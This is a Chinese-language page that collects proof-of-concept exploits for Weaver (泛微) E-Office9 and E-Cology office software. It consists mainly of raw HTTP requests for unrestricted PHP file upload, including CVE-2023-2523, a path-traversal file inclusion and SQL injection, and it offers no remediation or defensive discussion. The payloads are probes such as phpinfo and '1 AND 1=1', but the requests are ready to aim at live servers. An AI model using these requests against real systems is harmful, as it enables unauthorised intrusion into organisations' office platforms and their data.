泛微

目录

• e-office9 任意文件上传
• 泛微 Weaver E-Office9 前台文件包含 POC
• 泛微E-Office9文件上传漏洞 CVE-2023-2523 POC
• E-Cology 某版本 SQL注入漏洞 POC
• 泛微 ShowDocsImagesql注入漏洞

• 泛微 Weaver E-Office9 前台文件包含

• 泛微ecology（也称为泛微协同办公平台）是一种企业级协同办公软件，旨在提高企业内部协作和沟通效率。它提供了各种功能，如任务管理、文档共享、工作流程管理等，可以帮助企业实现信息共享和协同办公。

• emobile是泛微公司开发的一款移动办公应用，旨在让用户能够随时随地通过移动设备访问和处理企业数据和任务。emobile提供了移动端的协同办公功能，如查看和编辑文档、处理任务、查看日程安排等。
• e-office 中小型企业oa

e-office9 任意文件上传

Weaver E-Office9版本存在代码问题漏洞，该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题，对参数Filedata的操作会导致不受限制的上传。 Weaver E-Office9.0 POC or EXP

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.232.137:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--

泛微 Weaver E-Office9 前台文件包含 POC

---

http://URL/E-mobile/App/Init.php?weiApi=1\&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin\&m=12344554_../../attachment/xxx.xls

泛微E-Office9文件上传漏洞 CVE-2023-2523 POC

POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1

Host:192.168.233.10:8082

Cache-Control:max-age=0

Upgrade-Insecure-Requests:1

Origin:null

Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt

Accept-Encoding:gzip, deflate

Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7

Connection:close

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

Content-Disposition:form-data; name="upload_quwan"; filename="1.php."

Content-Type:image/jpeg

<?phpphpinfo();?>

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

E-Cology 某版本 SQL注入漏洞 POC

  POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1

Host: ip:port

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36

Connection: close

Content-Length: 189

Content-Type: text/plain

Accept-Encoding: gzip

callCount=1

page=

httpSessionId=

scriptSessionId=

c0-scriptName=DocDwrUtil

c0-methodName=ifNewsCheckOutByCurrentUser

c0-id=0

c0-param0=string:1 AND 1=1

c0-param1=string:1

batchId=0

泛微 ShowDocsImagesql注入漏洞

GET
/weaver/weaver.docs.docs.ShowDocsImageServlet?docId=* HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko) 5bGx5rW35LmL5YWz
Accept-Encoding: gzip, deflate
Connection: close

泛微 Weaver E-Office9 前台文件包含

http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls